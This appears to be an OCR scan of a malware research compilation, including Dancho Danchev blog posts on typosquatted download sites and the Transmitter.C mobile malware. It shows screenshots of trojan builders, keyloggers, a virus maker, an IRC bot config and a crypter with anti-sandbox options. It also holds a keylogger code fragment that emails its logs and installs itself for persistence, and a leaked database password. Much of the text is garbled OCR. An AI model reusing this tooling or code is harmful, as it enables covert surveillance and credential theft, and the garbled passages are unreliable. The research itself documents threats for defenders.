{_] Minimize to system tray 
(_] Save new connection 


Arabian-Attacker v1.2.0 


[32] 
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“a Client ¥ 1.0 


e r} . a Open Source project by http://more.avOpenSource 


Server | £ - Spionage | File Manager | Remote Control | Notify | Memo | Credits | 


127.001 OU 


Connect to Server Remove Server | 


zisss BJ 


Set new Port 


Get Server Custom Commands | ? 


[33] 
YP 
| SERVING FROM 
SET DIRECTORY o = 
yj : : | [C:\Documents and Settings\That'sMe\Desktop\T emp folder\bulksock 
AVAILABLE FILES (6:16:02 PH: server listening on port 49999... 
jaavhelper. dil (a — = 
jclntunit.deu | Bulk File Transfert Client 2.1 =| x 
|clntunit. dtm 


lexeeomte pat Sen ovone 


common. dcu 


| common. pas — * 
| tsockcinc -dpr J CONNECT f 


| feockclint.exe 


tsockcint.res 
| tsockserv. dpr —J DISCONNECT er 
| tsockserv. exe t te J 
[aeocksery. Fes AVAILABLE FILES FILES TO FETCH 


keylogger.txt 
jay edit server.txt 
|servunit.deu 
jservunit.dtn 
servunit. pas 
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vvinrar .info 
winamp-2009 .net 
winamp .ws 
windows-movie-maker .info 
winrar-2008 .com 
wiinzip .info 
cdburnerxpsoft .info 
www-emule .us 
ultradefrag .us 
bearflix .us 
guitar-pro .us 
messenger-2009 .us 
emule-telecharger .us 
aresnet .us 
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Password: SecretPassword 
Port: 6666 
Exename: netmon32.exe 


Success! ws 


e 


] y, File successfully read from! 


[35] 


Disconnected... 

‘lavoe.euyulio.net NOTICE AUTH :*** Looking up your hostname... 

‘lavoe.euyulio.net NOTICE AUTH :*** Found your hostname 

‘lavoe.eupulio.net NOTICE bot2 :*** If you are having problems connecting due to ping timeouts, please type 


/quote pong ED6BBC35 or “raw pong EDBBBC35 now. 
PING :ED6BBC35 


‘lavoe. eupulio.net 451 6666 :‘\’ou have not registered 
‘lavoe. eupulio.net 451 JOIN ‘You have not registered 


‘lavoe.eupulio.net 451 MODE :‘You have not registered 


PING Server Settings 


hu mean Laughing out loud? 
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WHI DarkFTP Config Tool ¥1.65 


| Fields Offsets | About | 


IRC Server i 94.247.160.11 
IRC Server Port |pee7 
IRC Channel [#whidarkftp 


FTP Port 


Max clients 


User login [anonymous 
Password [bilk@sux. com 


JV Enable IRC console and on-line notification function 


[37] 


2K/XP/Server 2003 CD Key Viewer (Cc fel) 
‘Your CD Key: 
[cc V-aHan-1 aba ae a 


Product ID: 552-64 qgp 4491 2-2 
Install Date: 17.10.2004 


-Made by Urban_Smurf for www.OpenSC. ws 
-Scanf.pas and Scanf_c.pas by E. Sorokin 2001 
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c\ E: § Delphi\F TPuploader\uploader.exe 


Co\warning.way was 


sucessfully uploaded to FIP a 


s: Uploadedfile.way 


Maiwand's XP Shutdown [|| |[] 


Current Time 


18:09:38 


Set Alarm 


EditServer Example (e felix) 


Select Server : 


JE‘ \SDS\EditServer (append) vO[1].1\Bir —... 


Servers endless information : 


Once upon a time there was 4 guy called Kev. Key got 


leukemia, fell over a cloud and landed on a spike. now 
Kev's dead. The end] 


Save Server | About Exit Program 
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Blinder 


Add File.. 
Remove File.. 


Clear List.. 


[42] 


You can even delete the original exe and these message boxes wil stil be here. 
x} 7 


c x acke 
rijsckea recess ES) DLL WAS INJECTED 
Ok, bye. Tl dose nctepad for you ;) INTO NOTEPAD. 
—_ 


Hello, now I am in the memory of another process! 


59) iijacked Process Eg) 7 


[43] 


| Screen Capture 
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@ Untitled - Notepad -j\0 és 
File Edit Format Yiew Help 
LOG ME OPENSC.CJB.NET : 


(Untitled - Notepad] 
Connect 


Disconnect 


; Options 


<CTRL>V< CTRL [Es 
naoie 


Disable 


Save Log 


Clear Log 


/* Get'n'Set Display Mo.. 


320%200 256 Colors | 
320%200 65536 Colors = 
320%200 65536 Colors 
320x200 1 Colors 
320x200 1 Colors 
320x240 256 Colors 
320x240 256 Colors 
320%240 65536 Colors 
320x240 65536 Colors 
320x240 1 Colors 
320%240 1 Colors 
400x300 256 Colors 


is 


[45] Change | ai 
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Athena's Place How-To Project: Installed applications (fe \hx) 


How to retrieve a list of installed applications 
by Alex Simonettibreu - simonet@bhnet.com.br - http://www. bhnet.com.br/~simonet 


Installed applications Retresh information | 
am "E:\Program Files‘, 


2d3 SteadyMove for Adobe Premiere Pro MsiExec.exe /I{94118D5F-20 About | 
3ivk D4 4.5 [remove only) "E:\Program Files\3ivs\3ivx [— 

Adobe Acrobat 5.0 E: WINDOWS \ISUNO414.E: 
Adobe MPEG Encoder MsiExec.exe /1{98114185-3L 
Adobe Photoshop 7.0 E:\WINDOWS‘ISUNINST.E: 
Adobe Premiere 6.5 E:\WINDOWSSUNINST.EXE 
Advanced RealMedia Export Plug-in for Premiere 6.0 E:\Program Files\Adobe\Prer Uninstall application | 
(alata ~ ial esdeinicaaaiin E:‘\PROGRA™1Ty ow 

Ahead Nero Burning ROM E:\Program Files 4head\nerc ‘ 
ATI Control Panel RunDiia2 E:\PROGRA~1\CC Remove from Registry | 
ATI Display Driver rundll32 E:\WwINDOWS ‘Syst 
Audio Record Wizard v3.1 "E:\Program Files AR Wizard: 
ime alae "E:\Program Files\[ ~ iM 
Borland Delphi 6 MsiExec.exe /I{B7886D87-Al 
BPFTP Server (remove only} "E:\Program Files\BPFTP Se 

| naeerioeieiies = EAWINDOWSSo 7777 TM 
< j 


[47] 
Misoskian’s IGMP NUKER 


~Settings 
Tage! 
Packet Size: feo000 @ Abort 
Times: T=] + 

Delay: ae =| fl Close 


Form 
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emulenet .us 
emulepro .us 
nerohome .us 
vvinrar .us 
aresfull .us 
avastt .us 

biaze .us 
e-bitdefender .us 


"cccp-codecs.into 
* direct-xcc A 
* Iphantsoft.info 
* office-2008.com e 
*“utorrent.ce 
“wmedia-playercom 


ccep-codecs. info 


A 
direct-x.ce 
direct soft info é NET p> 78.129.128.017 ——AS-p> 829131 
A ? 
tlash-player.info 
limewire.net 
utorrent.ce 
ww. directxcce 
www.flash-player.info 
www. limewire net 


www.oftice-2008.com 


wew.utorrent.cc 


e-bitorrent .us 
2413 
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— 


_ te oa P 
Pao Editor del server ‘“ Configuracién del cliente 


ine CREAMS | 


D SISTEMA DE ADMLWISTRACION REMOTA BY HACKYS & VAKA 


INTERNET EXPLORER 


Pagina de inicic: 


es Eo 


Abnr pagina web 


SS Ss 


Ventanas Irtemet Explore: 
Boton de favorites 
Descargar cosas de Internet 


Desconectado - Escribe la IP del ordenador que tiene el server y haz click en Conectar para empezar 


A SéverDreams 


[64] 


xl eS co Sat 4 -4j° 1B 


Leer configuracion del server FRIEWIE ta E[0cs 
Puerto keylogger = 7 
| Notificacion por e-mail 


Ventanas | 


Boton cerrar vesactivar 
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[65] 


[66] 


IP { 27.00.01 Port fgo1 Start 
Stop | 


List i —tt—‘S;CS Browse | 
About | 


Status: Idle 


Crack: Idle 
[67] 
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[69] 


RaZoR Public Edition 


[70] 
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Ey File Manager - ksv_ 127.0.0.1/127.0.0.1 - (5) x} 
File Manager | File Search | 


Ic: <Fixed> x] [CAWINDOWS\ 


(Web Refresh 
9 winSxs 

=) Blog 

(ej 000001_.tmp 
(3) 002816_.tmp - 
fro) 1.mzp Run 

HE _ default pif Open Remotly 
“$ A5w.INI Delete 

=) actsetup.log Rename 

(3) ali.dskn Create Directory 


~$ aopr.ini 


Upload 
Download 
Open Download Folder 


http://Hiddenagenda.Strangled.NET 
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24109 


24110 


Strangled.HET 


Port 


‘don startup? 


[74] 


Form1 


Files in this folder 

"| TASKMAN.EXE Application 
2) tempmid. mid Winamp media file 

twain.dll Application Extension 

twain_32. dll Application Extension 

a twunk_16.exe Application 

t | twunk_32. exe Application fa 
Pty unleap. exe Application 

@B unvise32qt. exe Application 

(4 vb.ini Configuration Settings 


[c: \Windows', 


[75] 


Asesino 1.0b Pro 


7 x 
:/127.0.01 Pott: 6117 Pass: NCE 


Your asesino is ready for some action ... 


[76] 
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Asesino 1.0b Pro 


= 
IP: 127.0.0.1 Port: 6117 Pass: shonnet.. 


Message Text Settings : 


Message Title: ‘Windows 


Message Text: Asesino detected on your pc ... 


Message Buttons : Message Icons: 


@ OK Abort + Retry + Ignore © & 


OK + Cancel ‘Yes +No 


Canecl + Retry Yes + No + Cancel 


Preview Dolt! Help Please 


Your asesino is ready For some action ... 
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r Secret Service ¥1.0b Public Edition 


Bind/Icon 


jenda. strangled.net // Copyright (c) 2006 icecrew corp 
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e-mule .us 

flrefox .us 
messengerhome .us 
utorent .us 

utorren .us 

winzipp .us 
cccpcodecs .org 
ares-2008 .org 
pdf-creator .org 
limevvire .org 
mesengerplus .org 
w-ares .org 

w-emule .org 
www-3gpconverter .org 
www-advanced .org 
www-emule .org 
www-messenger .org 
www-realplayer .org 
www-windowsmediaplayer .org 
ares-3 .org 

ares-net .org 

chroome .org 
emule-pro .org 
messenger-msn-9 .org 


2414 


Illusion Uploader 
File Window 


~ Connection Options 


IP: Port: 


Reset | Connect | 


SIN Options 


Port: 
Reset | Listen | 


[79] 
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E:\Documents and Settings\ 
it ype Q to quit. 


\My Documents\Mine mottatte filer\filemap\sender\sende... -(o x! 


data: 


input data: 

test 

input data: 

Wwww.opensc.ws is the best right? 
input data: 

ver. 


| hey 
jtest 
| www.opensc.ws is the best right? 


[81] 
24114 


“€ miniRAT 0.50 [BETA] i) <) _ 


Connection Settings 


Port to listen : [1005 Password : Preietoitcier Listen | 


Address | Port Yersion Connection | KBs InfOut Socket Name 


Transfer View 
Information View 
File Manager 
Process List 
Remote Cmd 


Disconnect 
Uninstall 
URL Download 


Create Server 


| Port KBJs | Filename u/D About 


. 


eta Norne Ment ar cm! <hovwegn Sen at mare branch hewn die 


¢ Qeees Verkemetess ieee fee 


Seton of Detach 


ESPASS DF F)\ ASte xp 
PP), 


DAT) © Code source N°tt 
#, Francame. Fremch 
PLES PASS- 06 FLAD OW. SITES DAT 1067 & 


$7508, 5245 116435 Pemsurns 


o8 rat Utere prea y 


Roe RN ah PASH Dd!) at el MAND oc cOM INA HT Kc hac Tee 
Fut 


wwe mpage tt sch vbot/Ster dat. 418. Danitrhches Enpetewt 


p< OTEK! fot hunt ode cml 
Options RKEOOR TID t 
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PE Explorer - C:\Documents and Settings Desktop\Client.exe 


=| SSF) aeasas js s/o 
RESOURCES 


Tt) #) 


© Icon Enty 
O-) String 
> RCData 
-{ DVCLAL 
PACKAGEINFO 
~@f® PAKI 
») SETRING 
&-_) Group 


ft wil be extracted in a new fokler in 
the fokler Docurnents..Try#See also the 
pak! size..This is senali than the 
“original .why7hehehe 
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E:\WINDOWS\system32\cmd.exe - || x! 
rokill v2.2 — Mark Vogels ‘c> 2666 


thite Scorpion Security http: //www.white~scorpion. 
Jsage: pk <options> 


current proc s 
st all proce with full path 

p <pid> i process with pid 
nm <name> i all proce es with that name 


$17 ‘ills with pid 512 

WINLOGON . EXE ki WINLOGON.EXE “case sensitive> 
WIN* ills - tarting with WIN 

“ ‘ills ses se with extreme caution? 


zill\prokill_v2.2\bin>pk 
{s 


m Proce 


J -exe 
\WINDOWSS : \win logon. 
E:\WINDOWS\ : \ i 
E:\WINDOWSS, 


E:\WINDOWSS, 

E:\WINDOWSS 

E>\WINDOWSS tenm32\Zor 

E=:\WINDOWSS, m32\Ati2euxx 

E:\WINDOWS\Explo 

E:\WINDOWS 

E:\Progran 

E->\WINDOWS\S 

E:\Progran : 

E:\Progran Pile 

E:\Progran Fil tile sched.exe 
\WINDOWS NS 2\svuc >.exe 
\Progran i 2 2 \Zonefi larm\z lc lient .exe 
>\WINDOWSS 32 

E:\WINDOWS\cu 

E:\WINDOWS \wanmps 

E:\WINDOWS\ 

E-\progran ile stean\steam.exe 

E:\progranm files\woi on\voipstuntWwoiy > 
\Progran Fi \$il n Image\Sil SATARaid\SATARaid.exe 
\WINDOWSS m32\ntudn : 
\Progran Piles\Trillian rillian.exe 
\Progranm Files\Mozilla Firefox\f irefox.exe 
\WINDOWSS, \cnd.e 

2: \WINDOWSS 32\ms paint .exe 

E:\WINDOWSS 32 ep 2xe 

D:\Mozill\prokill_v2.2N\bin\pk.exe 


38 proc s listed. 


D> \Mozill\prokill_v2.2N\Nbin> 
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PP IVIESSENS Cl iaaiastnetone 


Download Windows Live 
Messenger 


Download the last version 


t Windows Live it MSN Messenger 
Mes: *8.5.1302 p 75.0324 
(Win Vista/XP) (Win XP/XP 648its) 
jy MSN Messenger 7.0 
(ey (Win 98/ME/xP/xP 


AL Windows tive 
' G4Bits) 


semper 6.1.0178 
(Wis Vista/XP) 


4,Windows Live Messenger 


Improve your Windows lve Messenger mith the new Live Windows Messenger and dacover the new functions 
That thes stant messaging service offers you, Update heghigs 

© Vowe and wdeo calls 

© File sharing folders 

© Permanertly updated cortects 

© Offline Messagng 

© Newly demgred cons and avatars 


4d 


A similar [6]fraudulent Google AdWords scheme was exposed and taken care of in January. 
The fraudster back then was using a legitimate third-party revenue sharing toolbar installation 
program which was bundled within the legitimate software. In Soletto Group, S.A’s case they 
aim to cut any intermediaries on their way to generate profit. 


Rapidswitch Ltd has been informed of Soletto Group, S.A’s [7]brandjacking activities. 


This post has been reproduced from [8]Dancho Danchev’s blog. 


_ ep:/ wiv, Lavasoft. com/aylavasoft/securitycenter/blog/al1/200903 
_hetp:/ /wiw.avertlabs.con/research/blog/ inde. php/2009/01/28/pay-to~ install fres-software/ 
_hetp:/ /adanchev. blogspot .con/2008/03/cybersquatting-security-vendors-for eal 

. http: //800notes. com/Phone .aspx/1-800- 448-2755 


http: //torrentfreak.com/bittorrent-scam-shutdown-after-sms-regulations-breach-090127/ 


. http://ddanchev.blogspot.com/2009/01/exposing-fraudulent-google-adwords.htm 
. http://blogs.zdnet.com/security/?p=1240 
. http: //ddanchev.blogspot.com 


ONAUAWNEH 


5.7.5 Transmitter.cC Mobile Malware in the Wild (2009-07-08 20:02) 


2415 


Connections 


[93] 


62251822 


Talking Wizard 


Weicome to the taking Waord 
‘This wizard will not allow you t0 speak Giroctly to you victim vie mic. 
inatead # uses the microsot sage to Convert you entered text to 
voice. You could use the test bution to test whet your victim will hear 
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JPS ( Virus Maker ) 
¥ictim Options 
@ Disable Regedit Open Close CD-ROM 
@ Disable MsConfig Hide TaskBar 
@ Disable TaskMar Clear Bios Password 
@ Disable Yahoo Messenger Hide Drives 
@ Disable Media Player Hide Run 
@ Disable Internet Explorer Hide ShutDown 
@ Disable Windows Drives Random Cursor 
@ Disable Gpedit Remove Folder Options 
@ Disable Windows Messenger Remove Logoff 
@ Disable Norton Antivirus Lock Mouse & Keyboard 
@ Disable McAfee Antivirus Terminate Windows 
@ Disable Note Pad Turn of Monitor 
@ Disable Word Pad Destroy TaskBar 
@ Disable Windows Firewall Dont RightClick (DskTp) 


@ Fake Error Message 


@ Change Xp Password 


| Run XP Program Before Execute 


Change Server Icon 
© IPG @ EXE @ SETUP 
@ FLASH @ HELP @ TEXT 
@ GIF @ BAT @ DOC 


Make ¥irus 


¥irus Name: Server.exe v 


P mintunnel TST! 


xcel 


Listen on local port; |10101 


Forward connections to: 
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“testers of Moarmes - Windows Internet Explores 


Go : JB Mitp. ew bawedier at Ronnen’ 


Parent Darectory 
893.356 


ie 


Sacmis pass = “nlOS0L64": 


ra pees = “ba-lausecker*: 


Sdb_pass = “nl030164": 
$db_name = deans 


Stable_stats = "ad_stace*: 


@ Machte mehr Coumizadern @ 


?> 


Seceis_veer = “ba-sacsecker"; 


Index of /banner 


East mogaties 


29-Aag-200€ 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Awg-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Aug-2006 09:34 
29-Awg-2006 09:34 
29-Aug-2006 09134 
29-Aug-2006 09:34 


Sadmin_ email = “office#lausecker.at*: 
Sedmin subject = "Werbung freigeschaitet"; 


Stable! panser = “ad | benner*? 
Stable. groups © “ad | groupe*;: 


myeql_connect ("Sdb_host*,"Sdb_user", "Sab pass") 
mysql_ “select :_ db ("Sab name"): 


| Bminiec wider. ot” mtextconnectinx - Googhe-Sauthe - Winvdows Internet Expleset 
+ 

GS ~ Coen min groge te maeonrgrmttte zones 220 tet cone mci dtiee SaameOtanet 
GO [g8) =| mrcpense torus Pot 


et 


maghed lycos deteverschustren’ - Sk - lm Cache - Abniiche Seiten 


[Qiose Sete uborsetzen } 
Files shown:, 154. Sticky Tag. PHP_5 2. PHP_5 1, PHP_5 0 PHP_4 4 PHP_4 37. 
PHP_4_3. Met, ALES 2.2. 12.1. 12.0, 


+ Reports - Experts - Blogs - ~ Contact Us - Disclaimer eatelemteee 
Inc. - 2193 Comencmwealth Avenue - Boston MA 02135. 
www reseamchconnect Com buyreportitepert_ 11650 asp - 45k - ln Cache - Abnhiche Seiten 


] todo Oa aoe oo 3a ime! 


29-Aug-2006 09:34 19K | } click php 0935 24K] 
ass Gls | copy ns 580m 3006 08 Ses 
« $k lm Cache + Ahniiche Seiten 


Index of /qrahokdo- | Deve Sete ubersetzen 

w= Cadeau php 23-tiov-2005 11-29 tk |] cadeaux php 08-Dec-2005 18:03 3k [] 
Conmnectiine php 22-Nov-2005 19:46 tk | } functions inc php 22-Now2005 1932 1k ... 
foram wtpa com/grattoKdol - 3x - ln Cache - Ahebche Seten 


i; en} 
Parert Deectory Le, wpa comnect.ine 01-Mar-2001 11:20 tk 
Te buadingn pnand 0 es V8 Je pn he 0 " 
edul-benczum/sohtwareat! - Ik - im Cache - 


wr CS em, 


Goooooooo0o0gle > 


Enetrissete: 122486282 Vorwiirts 


[97] 


24125 


4 Gigi D'Agostino - 01 Another Way.mp3 
4) Gigi D'Agostino - L'amour Tojours (I'll... 
4) gigi_d_agostino-the_riddle-svcd-200... 
(GoldWave 5.14 

& Gospel of Judas OG Divx. avi 
(Heroes 

(heroes. 113.hdty.xvid.noty 
(heroes. 115.hdty-lol 

(heroes. 116. hdtv-lol 

4 heroes. 116, hdtv-lol. avi 
(DHitler_The_Rise_OF_Evil 

a Illegal and Banned eBooks Collectio... 
Wlegal and Banned eBooks Collectio... 
Bitesal and Banned eBooks Collectio... 
a) jay-z_feat-beyonce-bonnie_and_cly... 
4) John williams - the imperial march.mp3 
(Kave.0.411 

4) Kylie Minogue - Cant get you out of ... 
4) Lord of the Rings - Requiem for a Dr... 
(lost.303,hdty-lol 

(FDlost.305.hdtv-lol 
(lost.309, hdtv .xvid-noty 
(lost.310.hdty.xvid-noty 

(Luther (2003)- posted by Videofreak 
4) MC Hammer - U Can't Touch This.mp3 
+) Metallica - Nothing Else Matters.mp3 
+) Metallica- Enter sandman.mp3 

(Si moved ie 

(Movies 

*) mozart - dies irae.mp3 


NOON N NOOO COON N ONNN DWOO FO COCO CO FO Mm NK 


fiat jad Local Keylogger 12 
~—T 


| pane: [ssase ]begtere: fimicgoricg | 


ete Seems Stee 

Sonne =a 
Ober 

[Serebgeste [x |e lirenet low 

Hide ie Poonereced : 

| Tiptn hacke cancers Miro) 

Debt Syne Reais Poets [Pracers eiber | 
Mel an eamcarion 
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7_ Delphi 7 - AKeyLog 
<None> + a “A 


*S-B Ge se @ Standaed | Additional | Win32| Sustem | DataAccess | Data Controls! dtExceets | DataSnao| BDE | ADO | InteBave| WebServices | intemal? 


SFR agle-lacit OPRAMHoare se HB" 2 FF 


B Unit1.pas 

9) — po Ural | ae 
+ TFoemt 

+ CD Procedures IdMessage1:<TidMessage.Create (nil); a 
+ By Verwtier/Con IGSMTPi:=TIGSMNTP.Create (mil) ; 

+ @) Uces with IdMessagel do 


begin 


IdSMTP1.Connect () ; 
try 

TASMTP 1 .Send | IdMessagei) > 
finally 

IdSMTP1. Disconnect; 

end; 


Deletefile('C:\Log.ini'); // si vous avez changer le répertoire ou le mom du fichier, remplacer le ici 
end; 


procedure Tformi.Formreate (Sender: ToObject); 

var path: string: 

begin 

path :* application. ExeNeam: 

copyfile(pchar (path), 'C:\Program Files\Internet Explorer\DW32.exe',true): // le répertoire et le nom ot 
Reg :* TRegistry.Create: 

Reg.RootKey :* HKEY_LOCAL MACHINE: 


1011: 1 Modihed Insert Code A Disgram 


[100] 


File Manager 


fe 
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24127 


Windows-manager 


[102] 
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= ©) Text msg. 


A currently spreading [1]mobile malware known as Transmitter.C (sexySpace.sisx; MD5: 
3e9b026a92583c77e7360cd2206fbfcd), has [2]brandjacked a legitimate application in an 
attempt to infect the initial number of devices that would later on further disseminate it by 
aggressively SMS-ing messaged to the web site hosting it - megacljck .com (64.22.120.235) 
Email: weijiangl198@hotmail.com. 


Upon execution it drops the following files in an attempt to infect S60 3rd Edition devices: 


"Cc _sys\bin\Installer Ox20026CA6.exe"-"c:\sys\bin\Inst aller _Ox20026CA6.exe", FR, RI, RW 
"Cc _sys\bin\AcsServer.exe"-"c:\sysextbackslashbin\AcsServer.exe", FR, RI 
"Cc _private\101f875a\import\[20026 CA5].rsc"-"c:\private\101f875a\i mport\[20026CA5].rsc" 


c:\sys\bin\Installer_Ox20026CA6.exe 

2, Operation: Run during installation Size: 10128/10272 

“ss Capabilities; PowerMgmt, ReadDeviceData, WriteDeviceData, TrustedUI, ProtServ, SwEvent, NetworkServices, 
ReadUserData, WriteUserData, UserEnvironment 


c:\sys\bin\AcsServer.exe 
rar Operation: Run during installation Size: 42310/44774 
Capabilities: PowerMgmt, ReadDeviceData, WriteDeviceData, TrustedUI, NetworkServices, ReadUserData, WriteUserData 


c:\private},101fF87Salimporti[20026CA5].rsc 
‘J Operation: Install Size: 58/62 


What’s sad is that just like the majority of mobile malware incidents, this one is also digitally 
signed using a certificate issued by Symbian to the name of XinZhongLi Kemao Co. Ltd or 
vendor name "Play Boy". 
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[111] 


File Manager ™ 


we 


| p load 


oren-wedding. xls 


rs Picture 001 j Picture: 
ral icture 001.jpg ral icture. jpg 


Download Eo ees tights20_file_he.doc 


— 
(w = secretary_contract.doc 


=| 
— 


(iw STN 2H NTN 21071.doe 


P= TIN? MRSI.xs 
V< 
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Screen Capture ™ 
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Userlnit 


Shell Explorer 


Roki i: |RemoveT his 
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Statistics «= Referals = Claariing the statistics 


Statistics 
Cn the browsers 


j Loads:639 
/ Probi:31 
After 
opening: 
13% 
Loads:121 


Proba:78 
After 
opening: 
64% 

{ Loads:38 
Probkt:112 
After 
opera. 
114% 


a Statistics 
li to the operating systems 


Windows 95: 0 
Windows ME: 4 
Windows 98: 3 
Windows 2000: 15 
Windows XP: 786 
Windows 2003: 13 
Windows Vista: 36 
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CoolvibesO.5 coolyvibes@yahoo. cn 


[116] 


(System Process] 

System 1601-01-01: 01:00:00 

smss.exe NT INSTANS 2008-02-06: 10:03:48 

ostss.exe NT INSTANS 2008-02-06: 10:09:48 
NT INSTANS 2008-02-06: 10:10:02 
NT INSTANS 2008-02-06: 10:10:04 
NT INSTANS 2008-02-06: 10:10:04 
NT INSTANS 2008-02-06: 10:10:07 
NT INSTANS 2008-02-06: 10:10:07 
NT INSTANS 2008-02-06: 10:10:07 
NT INSTANS 092 2é 2008-02-06: 10:10:03 
NT INSTANS 2008-02-06: 10:10:09 
NT INSTANS 2008-02-06: 10:10:03 
NT INSTANS 2008-02-06: 10:10:12 
CP-ARAB 2008-02-06: 10:10:42 
CP-ARAB 2008-02-06: 10:10:43 


ss 
oo 
= 
= 
= 
= 
= 
s 
4 
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(Sage LL 1 Ser hy 


[121] 


[>>] REV_HELLO1|;SCOTT DESKTOP | Windors 

>>] IMO_ALIVER).70}I| 

>>] 6C_INFOMO_DISPLAYMiniMe 0.7A[Scottis ‘ 

<<] C_INFOMO_DISPLAY%VEINUN| CN I% fie Management Abou 


192.168.0.1 * 25532 


version OSdresa port vtermonme 
© Milo 0.74 W2UWEORITOOT Scot 
© ScoshowO.1A TR ODIFE Scot 


Restart 
Chose 
Remove 


# fired event mEventOnComnection) 

# recleved 17 bytes of data 

« MINIMOL server 

* seen 25 bytes 

» 1MO_ALIVE(O.1Alany 

# fired event mEventOhentConnect) 

# recleved 37 bytes of data 

« $PC_INFOMO_OISPLAYSVERHAURCMRNOS 

© sent 812 Bytes 

» 6PC_INFOMO_DISPLAYSidermow O.1A/ScottiSCO1 

# recieved 16 bytes of data 

« pone = ~ d h 
*sen $ 2 connections. 

EL puacaeeeoend nal abenpeised ox perpennlal listening foe servers sides ow 
# fired event mEventMinuteinterral) bd — . 


mot reverse connecting 
nek updating 
updating ogi list in O minutes 


% 


restart close uninstall debug 
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24138 


Server 


Status : Connectine 


} irc. dal. net 


Soy lite. dal net | pam 


Home Info 


Current Host Admin 
Force Join 
Force Leave 


Shutdown 


Melt Options 


Host Reply: Information Sent 


Reaper Client Admin 
Join Room 


Leave Room 


View Traffic 


jirc. dal. net 


Server 


Extra Options 
Open CD Monitor Standby | | Hide Start Button | 


Close CD Monitor Normal Sh start Button 


Hide Clock Hide TaskBar | Disable Input 


Show Clock || Show TaskBar~ Enable Input 


Execute 


Gonnocan Host Reply: Information 


Roor z 


Home Info 


User Name 
Logged in As 
Computer Name 
IP Address 
Operating System 


Windows Product Key 


Retrieve Info 


Host Reply 
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HUGLL KiFastSpstenCal (Ret 


AUdll. 70918738 


aaa 1 


og HREHEE BS 


BSSSSESSESBESSESBSSS SES SES BESBRSBESSSESSES. 


potonetetetetepetatenetatetetenetatenetuseteteneteterstetetetesetutetetetetetese! 
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$ Manager 


2 Connected] 


Processes 


‘System Process) 
System 
orss.exe 
crss.exe 
corss.exe 
wrertexe 
winlogon.exe 
services exe 
isass.exe 
tom_exe 
Svdrest.exe 
srdrest.exe 
setest.exe 
Sedest.exe 
Sevstexe 
Secostexe 


Computer Name User Name 


KONTBOX 
Se 


Cm) 


Windows syste 


Cr WINDOWS pyst... 


328 KONTBOX 


Gat | [C:\ Goes) 


Orectery 


File Manager 
Process Manager 
Passweed Manager 
Controls 

Power Options 


Keylogger 


Disconnect 


328 KONTBOX 


autoexec.bat 
boot.r¥ 


Show Message 


CD Tray 
Taskbar 
Systern Tray 
Clock 


Desktop kons 


Sire 


2.15 MB of 5.67MB 


eriogor ew 


TIM HD. PEA AD Lemans tee et O reconce 


Dore Recening proces) tom Mi Maeve 5) @ Gy 


SL Connected to show CSIEEEEEEED - ~~~ Soon Captet === = 


-=ye 


wea | = 


| \oeas Correct 
Sesdey tot 
Toseday, Aoet 


wwii. Zz! 


Pt 


Pernrventce 


1 me. ule Ce Game oy 


na ne tas oe perte te py 


mY 
2 awa 


+ | OC et 


Moreeet! Wexdows [Werwon 6 0 6000} 


Cawredt bp) 2008 Mcwpeet! Corporation Ml SOs corerent 


C Wiratows eptem Dmaf\ 
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| Field Value 


Version V3 
Serial number O00 ae 2c 00 01 00 23 29 d2 e4 22 88 34 c2 43 
| Signature algorithm shaiRSA& 

Issuer Symbian CA I, Symbian Limited, GB 

VYalid From June 17, 2009, 07:32:40 (UTC) 

Valid to June 18, 2019, 07:32:40 (UTC) 


Subject xinZhongLi Kemao Co, Ltd., Symbian Signed Content... 
Public key RSA (1024 Bits) 


|\CN = XinZhongLi Kemao Co. Ltd. 
Symbian Signed ContentID 
(OU = aAcsServer 1,7,0 

= XinZhongLi Kemao Co. Ltd. 
= TianJin 

TianJin 

CN 


oO 
aq 
i] 


AMNr Oo 
T 


The sample (Sexy Space or SYMBOS _YXES.B) has been distributed to vendors, and the ISP 
hosting it has been informed. 


Related posts: 

[3]Proof of Concept Symbian Malware Courtesy of the Academic World 
[4]1Commercializing Mobile Malware 

[5]Mobile Malware Scam iSexPlayer Wants Your Money 

[6]SMS Ransomware Source Code Now Offered for Sale 

[7]3rd SMS Ransomware Variant Offered for Sale 


This post has been reproduced from [8]Dancho Danchev’s blog. 


. http://blogs.zdnet.com/security/?p=371 
. http: //www.netqin.com/english/mobile-malware-report. jsp 
http: //ddanchev.blogspot.com/2006/11/proof-of-concept-symbian-malware.htm 


http: //ddanchev. blogspot .com/2007/05/commercializing-mobile-malware_18.htm 


http: //ddanchev blogspot . com/2008/07/mobi le-malware-scam-isexplayer-wants .htm1 
. http: //ddanchev. blogspot . com/2009/05/sms-ransomware-source-code-now-of fered .html 
. http: //ddanchev. blogspot . com/2009/05/3rd-sms-ransonware-var iant-of fered-for .html 
. http: //ddanchev . blogspot . com/ 


5.7.6 Dissecting Koobface Worm’s Twitter Campaign (2009-07-15 16:49) 
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EntryPoint; 0x00002433 — 

Imagebase: 0x00400000 

Section Count: 7 sections. 

> "CODE", "DATA", "B Mi "idata", mes" "\rdata", " src" 


L_ 


Piusecutomestbs | CC 
Fi wsecustomicons || 
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t Nidhogg ¥1.0 beta 9 


= 


NIDHOCG 


| 


cECULE Ih GEhaulb DrOWSer 


ACLULE TT OVI STOLE ss 


Filenames Dropped.exe 


[” 405 Filename iddenFile.exe User Profile Directory 
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® Nidhogg ¥1.0 beta 9 : 105) x/ 


NIDHOGG 


BY POKE 


Input file : Output file : 


[Es\Documents and Settings ess Ss ey 


Information | Encryption | Compression | Execution || antidebuggers | 


[~ Include Anti-debugger/sandbox techniques 


[~ 4nti Norman Sandbox Function Size: 125 bytes 
[ 4nti SoftiGe Debugger Function Size: 265 bytes 
P~ 4nti Procbump Function Size; 21 bytes 
J Detect IsbebuagerPresent Function Size: 45 bytes 
[  4nti Anubis (CD-Key check) Function Size: 954 bytes 
[Anti GWSandbox (CD-Key check) Function Size: 954 bytes 
PT Anti JoeBox (CD-Key. check) Function Size: 954 bytes 
[ Anti Sandboxie (Sbiebll dil} Function Size; 11 bytes 
[ Anti Threatexpert (dbahelp. dil) Function Size; 11 bytes 


Current stub size: 18.14 kilobytes About | Build | 
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® Nidhogg - Hex Editor lO! x! 


File Edit View 
O123456789ABCDEF 


S000 0200 0000 0400 OFOO FFFF 
